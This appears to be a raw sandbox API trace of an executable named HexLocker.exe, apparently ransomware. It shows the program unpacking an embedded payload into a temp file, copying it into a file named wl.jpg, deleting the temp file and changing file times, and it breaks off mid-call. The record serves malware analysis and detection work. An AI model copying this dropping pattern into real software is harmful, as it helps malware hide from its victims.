[0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) [0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) [0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) [0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) [0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) [0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) [0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) [0269.473] GetLastError () returned 0x0 [0269.473] SetLastError (dwErrCode=0x0) [0269.474] GetLastError () returned 0x0 [0269.474] SetLastError (dwErrCode=0x0) [0269.474] GetLastError () returned 0x0 [0269.474] SetLastError (dwErrCode=0x0) [0269.474] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8ceb5c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0269.474] GetFileType (hFile=0x2d0) returned 0x1 [0269.475] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.475] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0269.475] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0269.476] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.476] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0269.476] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0269.476] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.477] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0269.477] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0269.477] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.477] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0269.477] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0269.478] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.478] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ffb0 [0269.478] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=327580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ff9c [0269.478] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.479] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff9c [0269.479] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=393096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff88 [0269.479] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.479] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff88 [0269.479] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=458612, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff74 [0269.480] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.480] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff74 [0269.480] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=524128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff60 [0269.480] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.481] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff60 [0269.481] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=589644, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff4c [0269.481] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.482] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff4c [0269.482] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=655160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff38 [0269.482] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.482] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaff38 [0269.482] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=720676, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaff24 [0269.482] ReadFile (in: hFile=0x2d0, lpBuffer=0x8bec74, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8beb60, lpOverlapped=0x0 | out: lpBuffer=0x8bec74*, lpNumberOfBytesRead=0x8beb60*=0x10000, lpOverlapped=0x0) returned 1 [0269.483] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=726548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb1614 [0269.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1000) returned 0x2f04008 [0269.483] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8beb44, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8beb44*=0x1000, lpOverlapped=0x0) returned 1 [0269.483] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ceb74 | out: lpSystemTimeAsFileTime=0x8ceb74*(dwLowDateTime=0x46aea536, dwHighDateTime=0x1d67c7e)) [0269.483] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb2614 [0269.483] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\wl.jpg")) returned 0xffffffff [0269.484] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", lpFindFileData=0x8cebe0 | out: lpFindFileData=0x8cebe0*(dwFileAttributes=0x3, ftCreationTime.dwLowDateTime=0x8cebf0, ftCreationTime.dwHighDateTime=0x41af1a, ftLastAccessTime.dwLowDateTime=0x970894, ftLastAccessTime.dwHighDateTime=0x8cec30, ftLastWriteTime.dwLowDateTime=0x41e2c6, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x41e2bc, nFileSizeLow=0xe77912bb, dwReserved0=0x4900b0, dwReserved1=0x3, cFileName="", cAlternateFileName="")) returned 0xffffffff [0269.484] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bdc54 | out: lpSystemTimeAsFileTime=0x8bdc54*(dwLowDateTime=0x46aecc12, dwHighDateTime=0x1d67c7e)) [0269.484] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=726568, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb1628 [0269.484] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd718, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8bd718*=0x200, lpOverlapped=0x0) returned 1 [0269.485] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x46aecc12, dwHighDateTime=0x1d67c7e)) [0269.485] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x46aecc12, dwHighDateTime=0x1d67c7e)) [0269.485] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x46aecc12, dwHighDateTime=0x1d67c7e)) [0269.485] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb1828 [0269.485] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=726715, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb16bb [0269.485] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd718, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8bd718*=0x200, lpOverlapped=0x0) returned 1 [0269.485] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb18bb [0269.485] SetFilePointer (in: hFile=0x2d0, lDistanceToMove=731707, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb2a3b [0269.485] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8bd718, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8bd718*=0x200, lpOverlapped=0x0) returned 1 [0269.486] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x46aef3e4, dwHighDateTime=0x1d67c7e)) [0269.486] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x46aef3e4, dwHighDateTime=0x1d67c7e)) [0269.486] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bd704 | out: lpSystemTimeAsFileTime=0x8bd704*(dwLowDateTime=0x46aef3e4, dwHighDateTime=0x1d67c7e)) [0269.486] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bda68 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0269.486] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpPrefixString="aut", uUnique=0x0, lpTempFileName=0x8be128 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\aut90DD.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\aut90dd.tmp")) returned 0x90dd [0269.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0269.487] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\aut90DD.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\aut90dd.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x8bdb3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0269.488] GetFileType (hFile=0x2a0) returned 0x1 [0269.488] ReadFile (in: hFile=0x2d0, lpBuffer=0x8befb9, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8bdb78, lpOverlapped=0x0 | out: lpBuffer=0x8befb9*, lpNumberOfBytesRead=0x8bdb78*=0xf000, lpOverlapped=0x0) returned 1 [0269.488] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bdb68, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8bdb68*=0x1000, lpOverlapped=0x0) returned 1 [0269.492] WriteFile (in: hFile=0x2a0, lpBuffer=0x8bee48*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x8bc0dc, lpOverlapped=0x0 | out: lpBuffer=0x8bee48*, lpNumberOfBytesWritten=0x8bc0dc*=0x10000, lpOverlapped=0x0) returned 1 [0269.496] ReadFile (in: hFile=0x2d0, lpBuffer=0x8befb9, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bdb78, lpOverlapped=0x0 | out: lpBuffer=0x8befb9*, lpNumberOfBytesRead=0x8bdb78*=0x1000, lpOverlapped=0x0) returned 1 [0269.496] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bdb68, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8bdb68*=0x42b, lpOverlapped=0x0) returned 1 [0269.496] WriteFile (in: hFile=0x2a0, lpBuffer=0x8bee48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x8bc0dc, lpOverlapped=0x0 | out: lpBuffer=0x8bee48*, lpNumberOfBytesWritten=0x8bc0dc*=0x1000, lpOverlapped=0x0) returned 1 [0269.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1000) returned 0x2f05010 [0269.496] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f05010*, nNumberOfBytesToWrite=0x594, lpNumberOfBytesWritten=0x8bc0ec, lpOverlapped=0x0 | out: lpBuffer=0x2f05010*, lpNumberOfBytesWritten=0x8bc0ec*=0x594, lpOverlapped=0x0) returned 1 [0269.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f05010 | out: hHeap=0x970000) returned 1 [0269.497] CloseHandle (hObject=0x2a0) returned 1 [0269.499] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\aut90DD.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\aut90dd.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8bdb28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0269.499] GetFileType (hFile=0x2a0) returned 0x1 [0269.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0269.500] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\wl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x8bdb28, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0269.500] GetFileType (hFile=0x2d4) returned 0x1 [0269.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1000) returned 0x2f05010 [0269.500] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f05010, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bdb38, lpOverlapped=0x0 | out: lpBuffer=0x2f05010*, lpNumberOfBytesRead=0x8bdb38*=0x1000, lpOverlapped=0x0) returned 1 [0269.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20000) returned 0x2f16018 [0269.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0269.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f36020 [0269.502] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be1040, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8bdb20, lpOverlapped=0x0 | out: lpBuffer=0x3be1040*, lpNumberOfBytesRead=0x8bdb20*=0xf000, lpOverlapped=0x0) returned 1 [0269.502] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f05010, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8bdb10, lpOverlapped=0x0 | out: lpBuffer=0x2f05010*, lpNumberOfBytesRead=0x8bdb10*=0x1000, lpOverlapped=0x0) returned 1 [0269.507] WriteFile (in: hFile=0x2d4, lpBuffer=0x2f36020*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x8bc084, lpOverlapped=0x0 | out: lpBuffer=0x2f36020*, lpNumberOfBytesWritten=0x8bc084*=0x10000, lpOverlapped=0x0) returned 1 [0269.512] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be1040, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x8bdb20, lpOverlapped=0x0 | out: lpBuffer=0x3be1040*, lpNumberOfBytesRead=0x8bdb20*=0x594, lpOverlapped=0x0) returned 1 [0269.513] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be15d4, nNumberOfBytesToRead=0xe000, lpNumberOfBytesRead=0x8bdb20, lpOverlapped=0x0 | out: lpBuffer=0x3be15d4*, lpNumberOfBytesRead=0x8bdb20*=0x0, lpOverlapped=0x0) returned 1 [0269.513] WriteFile (in: hFile=0x2d4, lpBuffer=0x2f36020*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x8bc09c, lpOverlapped=0x0 | out: lpBuffer=0x2f36020*, lpNumberOfBytesWritten=0x8bc09c*=0x2000, lpOverlapped=0x0) returned 1 [0269.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1000) returned 0x2f46028 [0269.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0269.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0269.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36020 | out: hHeap=0x970000) returned 1 [0269.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f05010 | out: hHeap=0x970000) returned 1 [0269.516] CloseHandle (hObject=0x2a0) returned 1 [0269.516] WriteFile (in: hFile=0x2d4, lpBuffer=0x2f46028*, nNumberOfBytesToWrite=0xc37, lpNumberOfBytesWritten=0x8bc0d4, lpOverlapped=0x0 | out: lpBuffer=0x2f46028*, lpNumberOfBytesWritten=0x8bc0d4*=0xc37, lpOverlapped=0x0) returned 1 [0269.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f46028 | out: hHeap=0x970000) returned 1 [0269.517] CloseHandle (hObject=0x2d4) returned 1 [0269.522] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\aut90DD.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\aut90dd.tmp")) returned 1 [0269.524] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\wl.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0269.524] SetFileTime (hFile=0x2d4, lpCreationTime=0x8bdcb0, lpLastAccessTime=0x0, lpLastWriteTime=0x8bdcb8) returned 1 [0269.524] CloseHandle (hObject=0x2d4) returned 1 [0269.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0269.524] CloseHandle (hObject=0x2d0) returned 1 [0269.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0269.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0269.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0269.525] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0269.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0269.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0269.525] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0269.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0269.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0269.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0269.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0269.526] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0269.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0269.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0269.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0269.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0269.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0269.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0269.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0269.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0269.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0269.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0269.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0269.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0269.526] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0269.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0269.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0269.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0269.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0269.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0269.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0269.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0269.527] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0269.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0269.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0269.527] timeGetTime () returned 0x118397c [0269.527] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.527] Sleep (dwMilliseconds=0xa) [0269.555] timeGetTime () returned 0x1183998 [0269.555] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.556] Sleep 